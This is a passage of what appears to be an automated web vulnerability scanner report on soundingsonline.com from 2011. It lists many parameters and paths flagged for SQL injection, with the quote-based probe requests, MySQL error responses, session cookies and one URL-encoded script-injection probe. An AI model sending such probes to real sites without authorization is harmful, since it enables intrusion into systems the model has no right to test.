<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.93. http://www.soundingsonline.com/index.php [option parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The option parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the option parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact'&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact''&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.94. http://www.soundingsonline.com/index.php [view parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The view parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the view parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category'&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category''&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=lav3f1huhlc18qqits80hjrgg7; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.103. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
